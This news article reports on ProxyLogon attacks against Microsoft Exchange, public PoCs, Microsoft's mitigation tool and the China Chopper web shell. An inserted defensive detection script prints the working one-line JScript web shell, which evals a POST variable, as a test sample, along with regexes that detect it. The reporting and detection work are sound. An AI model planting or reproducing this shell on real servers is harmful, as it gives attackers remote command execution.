Exchange Cyber-attacks Increase – Microsoft Launches One-Click Fix!

Public proof-of-concept (PoC) exploits for Proxy Logon could be creating a ‘tsunami’ of attacks just as patching starts to work.

As dangerous attacks increase against Microsoft Exchange Servers following the disclosure of the Proxy Logon group of security bugs, a debate has started up over the public release of proof-of-concept (PoC) exploits. It is all leading to a deluge of cyber-activity.

The good news, however, is that Microsoft has issued a 1-click mitigation & remediation tool in response to the ongoing swell of attacks.

Advanced Persistent Threats

Researchers commented that while Advanced Persistent Threats (APTs) were the 1st ‘player’ when it comes to hacking vulnerable Exchange servers, the public PoCs mean that the exploit is now out there, & that less sophisticated cyber-criminals can start to take advantage of this opportunity.

“APTs…can reverse engineer the patches & make their own PoCs,” Roger Grimes, data-driven defence evangelist at KnowBe4, explained.

Level of Sophistication

“But publicly posted PoCs mean that the 1,000s of other hacker groups that don’t have that level of sophistication can do it, & even those groups that do have that sophistication can do it faster.”

After confirming the efficacy of one of the new public PoCs, security researcher Will Dormann of CERT/CC tweeted, “How did I find this exploit? Hanging out in the dark web? A hacker forum? No. Google search.”

Exploit Against Microsoft Exchange

Microsoft stated in early March that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange servers.

4 flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit – meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications & the opportunity to install a web shell for further exploitation within the environment.

Also, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data & drop malware on target machines for long-term remote access.

Patches

Microsoft quickly pushed out out-of-band patches for Proxy Logon, but even so, 10s of 1,000s of organisations have so far been compromised using the exploit chain.

It’s also apparent that Hafnium isn’t the only party of interest, according to multiple researchers; ESET said last week that at least 10 different APTs are using the exploit.

Sheer Volume

The sheer volume of APTs mounting attacks, most of them starting in the days before Proxy Logon became publicly known, has prompted questions as to the exploit’s provenance & ESET researchers mused whether it was shared around the Dark Web on a wide scale.

Several versions of the on-premises flavour of Exchange are vulnerable to the 4 bugs, including Exchange 2013, 2016 and 2019. Cloud-based & hosted versions are not vulnerable to Proxy Logon.

How Many Organisations at Risk?

Microsoft originally identified more than 400,000 on-premises Exchange servers that were at risk when the patches were 1st released on March 2. Data collected by RiskIQ indicated that as of Mar. 14, there were 69,548 Exchange servers that were still vulnerable. In a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.

“We released 1 additional set of updates on Mar. 11, and with this, we have released updates covering more than 95% of all versions exposed on the internet,” according to a post published by Microsoft last week.

Exploitation Attempts

However, Check Point Research (CPR) said this week that in its latest observations on exploitation attempts, the number of attempted attacks has increased 10x, from 700 on Mar. 11 to more than 7,200 on Mar. 15.

According to CPR’s telemetry, the most-attacked country has been the US (17% of all exploit attempts), followed by Germany (6%), the UK (5%), the Netherlands (5%) & Russia (4%).

The most-targeted industry sector meanwhile has been govt./military (23% of all exploit attempts), followed by manufacturing (15%), banking & financial services (14%), software vendors (7%) & healthcare (6%).

Numbers are Falling

“While the numbers are falling, they’re not falling fast enough,” RiskIQ suggested in its post.

“If you have an Exchange server unpatched & exposed to the internet, your organisation is likely already breached. One reason the response may be so slow is many organisations may not realise they have Exchange servers exposed to the Internet—this is a common issue we see with new customers.”

It added, “Another is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organisations to migrate to cloud email.”

Will these Attacks Get Worse?

Unfortunately, it is likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang published a PoC on GitHub, which chained 2 of the Proxy Logon vulnerabilities together.

GitHub quickly took it down in light of the 100s of 1,000s of still-vulnerable machines in use, but it was still available for several hours.

Then over the weekend, another PoC appeared, flagged & confirmed by CERT/CC’s Dormann:

Well, I will say that the Proxy Logon Exchange CVE-2021-26855 Exploit is completely out of the bag by now. https://t.co/ubsysTeFOj
I’m not so sure about the “Failed to write to shell” error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. pic.twitter.com/ijOGx3BIif

— Will Dormann (@wdormann) March 13, 2021

Praetorian Researchers

Earlier, on Mar. 8, Praetorian researchers published a detailed technical analysis of CVE-2021-26855 (the 1 used for initial access), which they used to create an exploit. The technical details offer a public roadmap for reverse-engineering the patch.

The original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft’s information-sharing program, according to a recent report in the Wall Street Journal.

In light of evidence that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from 1 of its security partners.

Bug Information

MAPP (the Microsoft Active Protections Program) delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures & indicators of compromise to their products & services. This can include, yes, exploit code.

“Some of the tools used in the 2nd wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies & other security partners Feb. 23, investigators at security companies say,” according to the report.

“Microsoft had planned to release its security fixes 2 weeks later, on Mar. 9, but after the 2nd wave began it pushed out the patches a week early, on Mar. 2, according to researchers.”

Mitigation Tool

Microsoft has released the Exchange On-premises Mitigation Tool (EOMT) to help smaller businesses without dedicated security teams to protect themselves.

“Microsoft has released a new, one-click mitigation tool, Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, & 2019 deployments,” according to a post published by Microsoft.

“This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.”

Microsoft explained that the tool mitigates exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, & also scans the server using the Microsoft Safety Scanner to identify any existing compromises, which it then remediates.

China Chopper

Amid this flurry of activity, more is becoming known about how the attacks work. For instance, the APT Hafnium, first flagged by Microsoft, is uploading the well-known China Chopper web shell to victim machines.

That’s according to an analysis from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.

Web Shell

China Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. When established, the backdoor — which hasn’t been altered much since its inception nearly a decade ago — allows adversaries to execute various commands on the server, drop malware & more.

“While the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,” according to Trustwave. “The China Chopper server-side ASPX web shell is extremely small & typically, the entire thing is just 1 line.”

Hafnium is using the JScript version of the web shell, researchers added.

HTTP POST

“The script is essentially a page where when an HTTP POST request is made to the page, & the script will call the JScript ‘eval’ function to execute the string inside a given POST request variable,” researchers explained.

“In the…script, the POST request variable is named ‘secret,’ meaning any JScript contained in the ‘secret’ variable will be executed on the server.”
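A defender-side detection heuristic built on the trait just described (a one-line JScript ASPX page that hands a POST variable to eval), added here as an example that is not part of the article or of Trustwave’s analysis. The sample page contents, file names and regular expressions are constructed for illustration, and the check is generalised beyond the ‘secret’ variable name, since that name is attacker-chosen and varies between drops.

```python
import re

# Constructed sample page contents for offline testing (not files from any real incident).
SAMPLES = {
    "ContactForm.aspx": '<%@ Page Language="C#" %>\n<html><body>\n'
                        '<form runat="server"><asp:TextBox id="msg" runat="server"/></form>\n'
                        '</body></html>',
    "legacy_form.aspx": '<%@ Page Language="VB" %><% Dim name = Request.Form("name") %>',
    # The one-line shape the article describes: a JScript page that evals a POST variable.
    "logon_helper.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["secret"],"unsafe");%>',
}

# eval() fed directly from request data; generalised beyond the name 'secret',
# which is attacker-chosen and varies between drops.
EVAL_REQUEST = re.compile(
    r'eval\s*\(\s*Request(?:\.Item|\.Form|\.QueryString|\.Params)?\s*[\[(]', re.IGNORECASE)
JSCRIPT_PAGE = re.compile(r'<%@\s*Page[^%]*Language\s*=\s*"?JScript"?', re.IGNORECASE)
UNSAFE_FLAG = re.compile(r'"unsafe"', re.IGNORECASE)  # JScript eval's "unsafe" mode
REQUEST_VAR = re.compile(
    r'Request(?:\.Item|\.Form|\.QueryString|\.Params)?\s*[\[(]\s*["\']([^"\']+)["\']')

def score_page(content: str) -> dict:
    """Return the indicators found in one ASPX page plus a heuristic verdict."""
    found = {
        "eval_of_request_data": bool(EVAL_REQUEST.search(content)),
        "jscript_page": bool(JSCRIPT_PAGE.search(content)),
        "unsafe_eval_flag": bool(UNSAFE_FLAG.search(content)),
        "one_liner": "\n" not in content.strip() and len(content) < 300,
    }
    # eval of request-supplied data is the decisive trait; the others raise confidence.
    found["suspicious"] = found["eval_of_request_data"]
    return found

def extract_request_variable(content: str):
    """Name of the request variable the page reads, i.e. the POST field carrying the script."""
    m = REQUEST_VAR.search(content)
    return m.group(1) if m else None

def scan(pages: dict) -> list:
    """Names of pages flagged as suspicious, sorted for stable output."""
    return sorted(name for name, body in pages.items() if score_page(body)["suspicious"])

if __name__ == "__main__":
    for name in scan(SAMPLES):
        print(f"{name}: eval of request variable '{extract_request_variable(SAMPLES[name])}'")
```

For a real hunt, build the `pages` dict from the contents of every .aspx/.asp file under the IIS web roots and pair any hit with the file’s creation time and the POST requests to it in the IIS logs.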

C Binary File

Researchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker’s systems.

“This client allows the attacker to perform many nefarious tasks such as downloading & uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,” explained Trustwave researchers.

“All this is made available just from the one line of code running on the server.”
